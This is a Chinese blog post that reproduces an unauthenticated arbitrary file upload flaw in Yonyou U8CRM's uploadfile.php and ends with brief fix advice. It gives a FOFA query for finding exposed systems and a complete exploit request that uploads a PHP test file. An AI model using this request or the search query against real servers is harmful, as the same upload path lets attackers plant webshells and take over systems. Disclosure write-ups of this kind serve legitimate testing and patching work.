【漏洞复现】用友 U8CRM uploadfile.php 任意文件上传漏洞

已于 2024-06-25 06:02:45 修改
阅读量556 收藏 3
点赞数 10
分类专栏: 漏洞复现 文章标签: web web渗透 渗透测试 漏洞 漏洞复现 网络安全
于 2024-06-24 00:39:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41924764/article/details/139730144
版权

免责声明:

        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。

产品简介

        用友CRM智能化销售与售后赋能工作台,以赋能团队和客户经营为目标,融入用友在客户关系与营销团队管理的丰富实践经验,专注为企业提供直分销融合一体化、移动化、自动化、社会化、智能化的销售、售后与客户管理解决方案,提升企业的区域客户经营能力与数字化管理决策能力

漏洞描述

        用友 U8CRM uploadfile.php 接口存在任意文件上传漏洞,攻击者可以通过漏洞上传任意文件甚至木马文件,从而获取服务器权限。

Fofa

body=“用友U8CRM”
image.png

漏洞复现

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11
Content-Length: 219
Content-Type: multipart/form-data; boundary=---***
Accept-Encoding: gzip, deflate, br
Connection: close

-----***
Content-Disposition: form-data; name="file"; filename="test.php "
Content-Type: application/octet-stream


-----***
Content-Disposition: form-data; name="upload"

<?php echo md5(1);unlink(__FILE__);?>
-----***--

返回包带着文件上传后存储的位置
image.png
访问
image.png

修复建议

1、如⾮必要,禁⽌公⽹访问该系统。
2、通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。
3、升级到产品到最新版本

凝聚力安全团队
关注
  • 10
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
漏洞复现用友-U8-CRM-文件读取-help2
知黑而守白
04-19 43
用友U8-CRM是一款由用友软件开发的客户关系管理(CRM)系统。它是基于用友U8企业管理软件平台开发的,旨在帮助企业有效管理和维护与客户之间的关系。该系统提供了一系列功能,包括客户信息管理、销售机会跟踪、市场营销活动管理、客户服务支持等。通过使用用友U8-CRM,企业可以更好地了解客户需求,提高销售效率,增强客户满意度,并实现更好的客户关系管理。用友U8-CRM help2 任意文件读取漏洞,攻击者可以通过构造精心设计的请求,成功利用漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。
用友U8 CRM uploadfile 文件上传致RCE漏洞复现
0xSec
05-22 508
用友U8CRM客户关系管理系统uploadfile.php 文件存在任意文件上传漏洞,未经身份验证的攻击者通过漏洞上传恶意后门文件,执行任意代码,从而获取到服务器权限。
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 645
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
漏洞复现用友U8 CRM uploadfile 文件上传致RCE漏洞
最新发布
siu~
05-23 251
用友 U8 CRM客户关系管理系统 `uploadfle.php` 文件存在任意文件上传漏洞,未经身份验证的攻击者通过漏洞上传恶意后门文件,执行任意代码,从而获取到服务器权限。
用友crm-systemuploadfile接口存在任意文件上传漏洞
weixin_43167326的博客
04-01 344
需要加入内部知识星球可点击上方链接,资源包含但不限于网上未公开的day漏洞(更新漏洞POC共500+),2024最新企业SRC/CNVD/Edu实战挖掘技巧报告,红队内网横向渗透,代码审计,JS逆向,SRC培训等课程。该系统具有灵活性强、界面友好、功能完善等特点,支持移动端访问,便于随时随地管理客户关系,提高销售效率和客户满意度。技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
用友U8+ CRM任意文件上传任意文件读取 实战
m0_43397796的博客
02-24 2050
用友CRM系统,使用量非常广,这里存在任意文件读取漏洞任意文件上传漏洞
漏洞复现用友-U8-CRM-文件上传-swfupload
知黑而守白
04-19 110
用友U8-CRM是一款由用友软件开发的客户关系管理(CRM)系统。它是基于用友U8企业管理软件平台开发的,旨在帮助企业有效管理和维护与客户之间的关系。该系统提供了一系列功能,包括客户信息管理、销售机会跟踪、市场营销活动管理、客户服务支持等。通过使用用友U8-CRM,企业可以更好地了解客户需求,提高销售效率,增强客户满意度,并实现更好的客户关系管理。用友U8-CRM swfupload接口存在任意文件上传漏洞
UploadFile.class.php支持多文件上传的上传类
03-31
UploadFile.class.php支持多文件上传的上传类 说明:支持多文件上传的上传类 使用方法: include '../UploadFile.class.php'; $upload=new UploadFile(); if(!$upload->upload()) { // 上传错误提示错误信息 $...
jsp+javabean_uploadfile.rar_java uploadfile_jsp uploadfi_jsp 文件上
09-23
在Java Web开发中,文件上传是一项常见的功能,用于允许用户将本地文件上传到服务器。本教程将详述如何使用JSP(JavaServer Pages)和JavaBean来实现多文件上传的功能。我们将围绕以下核心知识点展开: 1. **...
小程序wx.uploadFile出现中文无法上传或者出现乱码
03-29
各位同学小程序中碰到上传图片或者文件时有用到formData的  formData Object 否 HTTP 请求中其他额外的 form data  出现中文无法上传或者出现乱码时可以参考一下这篇跳坑指南微信小程序联盟-uploadFile跳坑指南  ...
uploadFile.zip
07-26
本压缩包"uploadFile.zip"包含了一个简单的Spring Boot项目,演示了如何实现文件上传的功能。下面将详细解释这个模型中涉及的关键知识点。 1. **Spring Boot 2.0基础**: Spring Boot 2.0是基于Spring Framework 5...
UploadFile.zip
04-07
在JavaWeb开发中,文件上传是一项常见的功能,用于允许用户将本地文件如图片、文本、视频等上传到服务器。"UploadFile.zip" 提供了一个实现这一功能的资源包。在这个包中,我们可以找到相关的代码、配置和可能的示例...
MS17-010(永恒之蓝) 漏洞检测及利用教程
凝聚力安全团队
11-13 5980
漏洞描述: 攻击者向 Microsoft 服务器消息块SMB服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。 影响版本: - Windows Vista - Windows 7 - Windows 8.1 - Windows RT 8.1 - Windows 10 - Windows Server 2008 和 Windows Server 2008 R2 - Windows Server 2012 和 Windows Server 201
CVE-2020-1938 Apache-Tomcat-Ajp (幽灵猫)文件包含漏洞复现
凝聚力安全团队
11-15 4470
目录漏洞描述影响版本漏洞环境搭建漏洞利用任意文件读取本地包含命令执行,测试ping dnslog反弹shell漏洞加固参考文章 漏洞描述   该漏洞使攻击者可以读取任何webapps文件(例如webapp配置文件,源代码等)或包括一个文件来远程执行代码。由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。 影响版本 Apache Tomcat 6 Apache Tomcat 7 &lt
CVE-2012-2122 Mysql身份认证漏洞及利用
凝聚力安全团队
01-25 4168
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞检测msf漏洞利用漏洞加固建议参考链接 漏洞描述   当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 影响版本 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
CVE-2018-12613 PHPmyadmin文件包含漏洞分析及漏洞利用
凝聚力安全团队
11-20 4061
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固 漏洞描述    影响版本 漏洞环境搭建 漏洞分析 漏洞利用 漏洞加固
CVE-2017-7529 Nginx越界读取缓存漏洞
凝聚力安全团队
01-26 4018
目录漏洞描述影响版本漏洞环境搭建漏洞原理漏洞利用漏洞加固参考链接 漏洞描述   从0.5.6到1.13.2(含)的Nginx版本容易受到nginx范围过滤器模块中整数溢出漏洞的攻击,从而导致特制请求触发的潜在敏感信息泄漏。 影响版本 Nginx 0.5.6 – 1.13.2 漏洞环境搭建 使用docker 启动vulhub中的CVE-2017-7529环境 docker快速入门以及漏洞环境搭建 漏洞原理 Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,
uni.uploadFile上传文件
09-26
uni.uploadFile是一个uni-app框架提供的API,用于上传文件。通过该API可以将文件上传到服务器,并在上传成功后返回响应数据。在使用该API时,需要传入一些参数,如上传文件的路径、服务器接口地址等。具体的使用方法如下所示: 1. 引入uni.uploadFile方法,并在其中配置相关参数,例如: uni.uploadFile({ url: 'https://www.example.com/upload', // 服务器接口地址 filePath: tempFilePaths, // 待上传的文件路径 name: 'file', // 上传文件对应的 key formData: { 'user': 'test' }, // 其他额外的表单数据 success: (uploadFileRes) => { // 上传成功的回调函数 console.log(uploadFileRes.data); // 输出上传成功后的响应数据 } }); 2. 后端配置php接口文件,例如新建tp_imgsrc.php文件,其中编写上传图片的函数uploadimg。通过move_uploaded_file函数将文件从临时目录移动到目标目录。上传成功后,返回一个包含上传文件信息的json数据。 3. 在前端的upload方法中调用uni.chooseImage方法选择待上传的图片文件,并在成功回调函数中调用uni.uploadFile方法上传文件到服务器。上传成功后,输出上传成功后的响应数据。 以上是使用uni.uploadFile上传文件的一般步骤和示例代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凝聚力安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值